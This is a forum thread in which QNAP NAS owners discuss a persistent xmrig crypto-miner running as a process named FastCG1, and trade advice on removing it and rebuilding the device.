FastCG1 - Virus?
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
FastCG1 - Virus?
Hi,
I have noticed my Qnap TS-453A NAS getting really slow.
I find a process named FastCG1 which had 100% processor and memory usage. Killed it via SSH but came back always.
I have decided to upgrade firmware but I had to kill this process because nas would not restart because of high processor usage. During this I have noted a wget request see attached . Checked this site and I am not sure this is a system file.
The downloaded file attached as zip but ".zip" just written by me because it would not let me upload. Original file is xmrig.x86_64
What do you think?
I have noticed my Qnap TS-453A NAS getting really slow.
I find a process named FastCG1 which had 100% processor and memory usage. Killed it via SSH but came back always.
I have decided to upgrade firmware but I had to kill this process because nas would not restart because of high processor usage. During this I have noted a wget request see attached . Checked this site and I am not sure this is a system file.
The downloaded file attached as zip but ".zip" just written by me because it would not let me upload. Original file is xmrig.x86_64
What do you think?
You do not have the required permissions to view the files attached to this post.
-
- Experience counts
- Posts: 2415
- Joined: Wed Jan 08, 2014 10:34 pm
Re: FastCG1 - Virus?
The file appears to be a crypto-currency miner.Checked this site and I am not sure this is a system file.
https://www.google.co.uk/search?q=xmrig.x86_64
TS-431+ for storage and media and a bunch of IP cams under Surveillance Station. TVS-473 as files backup and QVR Pro.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
Ahh yes, you are right.
How can I kill this? If I kill process, it comes back in few secs.
How can I kill this? If I kill process, it comes back in few secs.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
Kill your NAS (you have no idea where and what has been compromised)
Start it from scratch
Never ever expose it again to WAN
you could also open a ticket with qnap..so they can update malware remover based on your case
Start it from scratch
Never ever expose it again to WAN
you could also open a ticket with qnap..so they can update malware remover based on your case
Last edited by dolbyman on Mon Oct 18, 2021 8:53 pm, edited 1 time in total.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
Thanks for info,
Killed processes continously it appeard in browser station, than appcenter, than container station.
killed all cron process and now it looks ok, updated malware scan, since then it nothing happens.
Unfortunately MalwareRemover has no logs...
I use this as VPN server and WebServer years ago. Sometimes I had few issues but those were solved more easy than this.
Ticket opened.
Killed processes continously it appeard in browser station, than appcenter, than container station.
killed all cron process and now it looks ok, updated malware scan, since then it nothing happens.
Unfortunately MalwareRemover has no logs...
I use this as VPN server and WebServer years ago. Sometimes I had few issues but those were solved more easy than this.
Ticket opened.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
It looks issue solved for now:
- WAN disabled
- /usr/bin/FastCG1 -> Deleted
- /user/bin/config.json -> Deleted
- /tmp -> Deleted all files
Opened port limited for specific IP-s in firewall.
- WAN disabled
- /usr/bin/FastCG1 -> Deleted
- /user/bin/config.json -> Deleted
- /tmp -> Deleted all files
Opened port limited for specific IP-s in firewall.
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
Hello,
I am having this same issue, I was wondering if it came back for you. I did what you tried. It did remove it and stop it but after a server restart it comes back.
Thanks for any info.
I am having this same issue, I was wondering if it came back for you. I did what you tried. It did remove it and stop it but after a server restart it comes back.
Thanks for any info.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
Did you read my posting about killing the NAS ?
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
That's not really an option at this stage. as we try to gather some of the important data and other functions of our system. I was more curious if Deakgyuri saw it return after a restart? I want to work with qnap more on this to update the malware tool with some of my info. I am curious how this form topic is the only info on this threat and it looks really new from what I can find.
Thanks again.
Thanks again.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
Probably limited to a specific kind of vulnerability (outdated wordpress or phpMyAdmin ran on NAS)
So did you contact QNAP already (if you want to work with them ..) ?
On top, you have no idea what this malware does next, could sideload ransomware and then all your (apparently business) data is gone
So did you contact QNAP already (if you want to work with them ..) ?
On top, you have no idea what this malware does next, could sideload ransomware and then all your (apparently business) data is gone
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
I have contacted them but no response as of yet. It does use PHPmyadmin for an internal website.
I am not to worried about the ransomware due to our back up strategy. I'm more trying to keep it going until an out of business day so i can do more to remedy the issue.
Do you think just a factory reset on the system but leaving data intact would be enough? Or recover data from an older back up. Loose about 3-4 days of work.
I am not to worried about the ransomware due to our back up strategy. I'm more trying to keep it going until an out of business day so i can do more to remedy the issue.
Do you think just a factory reset on the system but leaving data intact would be enough? Or recover data from an older back up. Loose about 3-4 days of work.
- dolbyman
- Guru
- Posts: 35268
- Joined: Sat Feb 12, 2011 2:11 am
- Location: Vancouver BC , Canada
Re: FastCG1 - Virus?
I would kill each drive with diskpart (OS is on the drives) and then restore the files from your most recent backups . also take a peek at your autorun.sh (malware likes to add encrypted stuff in there to bootstrap itself even after reset)
https://wiki.qnap.com/wiki/Running_Your ... at_Startup
https://wiki.qnap.com/wiki/Running_Your ... at_Startup
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
From what i can see autorun.sh is not enabled and the file is empty. As soon as I started updating three of my apps in the app center. The prosses Fastcg1 started running again under the process of what ever app was updating. So it looks like it waits until something installs or updates or checks update then runs.
-
- New here
- Posts: 5
- Joined: Tue Nov 09, 2021 4:19 am
Re: FastCG1 - Virus?
This is what i get looking at the conf folder. I don't see anything unless i am missing something.
You do not have the required permissions to view the files attached to this post.
-
- Starting out
- Posts: 10
- Joined: Sun Feb 18, 2018 5:03 pm
Re: FastCG1 - Virus?
Sorry I did not read post because I did not see that process and Qnap finally contacted me than they did nothig but deleted FastCG1.
Today I noticed again the XMRig. I have no idea where it came.
I did start the program, now I can see they coming from 8.214.124.124:17777
Actually I am making an other backup than I will delete the whole OS
Today I noticed again the XMRig. I have no idea where it came.
I did start the program, now I can see they coming from 8.214.124.124:17777
Actually I am making an other backup than I will delete the whole OS
You do not have the required permissions to view the files attached to this post.